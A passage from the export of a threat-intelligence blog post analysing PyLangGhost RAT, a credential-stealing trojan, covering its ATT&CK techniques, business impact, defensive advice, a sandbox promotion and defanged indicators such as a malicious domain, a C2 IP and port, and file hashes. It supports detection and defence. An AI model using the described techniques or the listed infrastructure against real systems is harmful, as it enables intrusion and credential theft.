&nbsp;<\/p>\n\n\n\n<p>Let&#8217;s move on to the ATT&amp;CK matrix, which ANY.RUN builds automatically.\u00a0<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">PyLangGhost RAT ATT&amp;CK Details&nbsp;<\/h2>\n\n\n\n<p>PyLangGhost RAT shares several tactics, techniques, and procedures (TTPs) with its related families, <strong>OtterCookie<\/strong>,&nbsp;<strong>InvisibleFerret<\/strong>, and&nbsp;<strong>BeaverTail<\/strong>, but also introduces some new ones:&nbsp;<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-248\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"4\"\n           data-wpID=\"248\"\n           data-responsive=\"0\"\n           data-has-header=\"0\">\n\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:33.333333333333%;                    padding:10px;\n                    \"\n                    >\n                                        T1036\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:33.333333333333%;                    padding:10px;\n                    \"\n                    >\n                                        Masquerading\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C1\"\n
                  data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:33.333333333333%;                    padding:10px;\n                    \"\n                    >\n                                        Renames legitimate binaries such as\u00a0python.exe\u00a0to\u00a0csshost.exe.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1059\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Command and Scripting Interpreter\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Initiates execution by using\u00a0wscript.exe\u00a0to run\u00a0update.vbs\u00a0and\u00a0csshost.exe\u00a0to launch the\u00a0nvidia.py\u00a0loader.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n          
                      <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1083\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Files and Directory Discovery\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Enumerates user profiles and browser extensions.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1012\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n  
                  data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Query Registry\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Gains persistence via registry entries created by the\u00a0update.vbs\u00a0script.\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-248'>\ntable#wpdtSimpleTable-248{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-248 td, table.wpdtSimpleTable248 th { white-space: normal !important; }\n<\/style>\n\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"277\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-1024x277.png\" alt=\"\" class=\"wp-image-15312\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-1024x277.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-300x81.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-768x208.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-1536x415.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-2048x554.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-370x100.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-270x73.png 270w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/19-740x200.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>MITRE ATT&amp;CK Matrix<\/em><\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Business Impact of PyLangGhost RAT&nbsp;<\/h2>\n\n\n\n<p>PyLangGhost RAT poses a significant risk to organizations in the technology, finance, and cryptocurrency sectors, with potential consequences including:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Financial losses:<\/strong> Compromised cryptocurrency wallets and stolen credentials can lead directly to asset theft and fraudulent transactions.<\/li>\n<li><strong>Data breaches:<\/strong> Exfiltration of sensitive corporate data, browser-stored credentials, and internal documents can expose intellectual property, customer information, and strategic plans.<\/li>\n<li><strong>Operational disruption:<\/strong> Persistent remote access allows attackers to move laterally, deploy additional payloads, and disrupt business-critical systems.<\/li>\n<li><strong>Reputational damage:<\/strong> Public disclosure of a breach tied to a high-profile state-sponsored group can undermine client trust and brand credibility.<\/li>\n<li><strong>Regulatory consequences:<\/strong> Data theft incidents may trigger compliance violations (e.g., GDPR, CCPA, financial regulations), resulting in legal penalties and reporting obligations.<\/li>\n<\/ul>\n\n\n\n<p>Given its low detection rate and targeted social engineering approach, PyLangGhost RAT enables attackers to operate inside a network for extended periods before discovery, increasing both the scope and cost of an incident.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">How to Fight Against 
PyLangGhost RAT&nbsp;<\/h2>\n\n\n\n<p>Defending against PyLangGhost RAT requires a combination of proactive detection, security awareness, and layered defenses:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Use behavior-based analysis:<\/strong> Solutions like&nbsp;<strong><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s Interactive Sandbox<\/a><\/strong>&nbsp;can detect PyLangGhost RAT in minutes by exposing its execution chain, raw IP C2 connections, and credential theft activity.<\/li>\n<li><strong>Validate unexpected commands:<\/strong> Educate employees never to run commands or scripts provided during job interviews or online \u201ctechnical tests\u201d without verification from security teams.<\/li>\n<li><strong>Restrict administrative privileges:<\/strong> Limit standard users\u2019 ability to run processes with elevated rights, reducing the malware\u2019s ability to retrieve encrypted browser keys.<\/li>\n<li><strong>Monitor for anomalous network traffic:<\/strong> Look for unusual outbound connections to raw IP addresses (rather than domain names) or rapid, repeated HTTP requests from unexpected processes, such as the renamed Python interpreter (csshost.exe) described above.<\/li>\n<li><strong>Harden browser data security:<\/strong> Apply policies to clear cookies and credentials regularly, disable unneeded browser extensions, and enforce hardware-backed encryption where available.<\/li>\n<li><strong>Incident response readiness:<\/strong> Maintain a process for rapid sandbox testing of suspicious files or scripts to shorten investigation times and reduce business impact.<\/li>\n<\/ul>\n\n\n\n<h2 
class=\"wp-block-heading\">Spot Similar Threats Early, Minimizing Business Risk&nbsp;<\/h2>\n\n\n\n<p>When facing dangerous malware like PyLangGhost RAT,&nbsp;<strong>speed of detection <\/strong>is important. Every minute an attacker remains undetected increases the chances of stolen data, financial loss, and operational disruption.&nbsp;<\/p>\n\n\n\n<p><strong><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s Interactive Sandbox<\/a><\/strong>&nbsp;helps organizations identify and analyze threats like PyLangGhost RAT within minutes, combining real-time execution tracking with behavior-based detection to uncover even low-detection or newly emerging malware.&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Rapid incident response: <\/strong>Detect threats early to stop lateral movement, data exfiltration, and further compromise.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Lower investigation costs: <\/strong>Automated analysis delivers verdicts quickly, reducing the time and resources needed for manual investigation.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Faster, smarter decisions:<\/strong> Clear visualized execution flows help security teams assess impact and choose the right containment measures.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Increased SOC efficiency: <\/strong>Streamlines detection, analysis, and reporting in one workflow, eliminating unnecessary manual steps.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Proactive threat hunting: <\/strong>Flags stealthy or low-signature artifacts, enabling defenders to identify and block similar threats before they spread.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Early detection for business means lower risk, reduced costs, and stronger 
resilience against advanced cyberattacks.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/any.run\/demo\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktodemo\" target=\"_blank\" rel=\"noreferrer noopener\">Try ANY.RUN to see how it can strengthen your proactive defense<\/a>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Gathered IOCs&nbsp;<\/h2>\n\n\n\n<p>Domain: 360scanner[.]store<\/p>\n\n\n\n<p>IPv4: 13[.]107.246[.]45<\/p>\n\n\n\n<p>IPv4: 151[.]243.101[.]229<\/p>\n\n\n\n<p>URL: https[:]\/\/360scanner[.]store\/cam-v-b74si.fix<\/p>\n\n\n\n<p>URL: http[:]\/\/151[.]243[.]101[.]229[:]8080\/<\/p>\n\n\n\n<p>SHA256 (auto.py.bin) = bb794019f8a63966e4a16063dc785fafe8a5f7c7553bcd3da661c7054c6674c7<\/p>\n\n\n\n<p>SHA256 (command.py.bin) = c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb<\/p>\n\n\n\n<p>SHA256 (config.py.bin) = c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45<\/p>\n\n\n\n<p>SHA256 (nvidia.py.bin) = a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940<\/p>\n\n\n\n<p>SHA256 (util.py.bin) = ef04a839f60911a5df2408aebd6d9af432229d95b4814132ee589f178005c72f<\/p>\n\n\n\n<p>FileName: chrome_logins_dump.txt<\/p>\n\n\n\n<p>FileName: gather.tar.gz<\/p>\n\n\n\n<p>Mutex: .store<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Further Reading&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/otx.alienvault.com\/pulse\/688186afb933279c4be00337\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">https:\/\/otx.alienvault.com\/pulse\/688186afb933279c4be00337<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/275e3573-0b3e-4e77-afaf-fe99b935c510\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/app.any.run\/tasks\/275e3573-0b3e-4e77-afaf-fe99b935c510<\/a>&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/www.virustotal.com\/gui\/file\/a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940\/detection\" target=\"_blank\" rel=\"noreferrer noopener 
nofollow\">https:\/\/www.virustotal.com\/gui\/file\/a179caf1b7d293f7c14021b80deecd2b42bbd409e052da767e0d383f71625940\/detection&nbsp;<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.virustotal.com\/gui\/file\/c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45?nocache=1\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">https:\/\/www.virustotal.com\/gui\/file\/c7ecf8be40c1e9a9a8c3d148eb2ae2c0c64119ab46f51f603a00b812a7be3b45?nocache=1<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.virustotal.com\/gui\/file\/c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb\/community\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">https:\/\/www.virustotal.com\/gui\/file\/c4fd45bb8c33a5b0fa5189306eb65fa3db53a53c1092078ec62f3fc19bc05dcb\/community<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Editor\u2019s note:&nbsp;The current article is authored by Mauro Eldritch, offensive security expert and threat intelligence analyst. You can&nbsp;find Mauro on X.&nbsp; North Korean state-sponsored groups, such as Lazarus, continue to target the financial and cryptocurrency sectors with a variety of custom malware families. 
In previous research, we examined strains like InvisibleFerret, Beavertail, and OtterCookie, often [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":15291,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,10,77,34],"class_list":["post-15287","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-cybersecurity","tag-guest-post","tag-malware-analysis"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0 - ANY.RUN&#039;s Cybersecurity Blog<\/title>\n<meta name=\"description\" content=\"Discover analysis of PyLangGhost RAT, the newest Lazarus Group malware targeting finance and tech professionals.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Mauro Eldritch\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"16 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/\"},\"author\":{\"name\":\"Mauro Eldritch\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0\",\"datePublished\":\"2025-08-06T10:31:04+00:00\",\"dateModified\":\"2025-08-06T13:47:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/\"},\"wordCount\":3254,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"cybersecurity\",\"guest post\",\"malware analysis\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/\",\"name\":\"PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0 - ANY.RUN&#039;s Cybersecurity Blog\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2025-08-06T10:31:04+00:00\",\"dateModified\":\"2025-08-06T13:47:54+00:00\",\"description\":\"Discover analysis of PyLangGhost RAT, the newest Lazarus Group malware targeting finance and tech 
professionals.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required 
name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"Mauro Eldritch\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/01\/Mauro-copy.jpeg\",\"caption\":\"Mauro Eldritch\"},\"description\":\"Mauro Eldritch is an Argentinian-Uruguayan hacker, founder of BCA LTD and DC5411 (Argentina \/ Uruguay). He has spoken at various events, including DEF CON (12 times). He is passionate about Threat Intelligence and Biohacking.\u00a0He currently leads Bitso\u2019s Quetzal Team, the first in Latin America dedicated to Web3 Threat Research. Follow Mauro on: X LinkedIn GitHub\",\"url\":\"#molongui-disabled-link\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->"}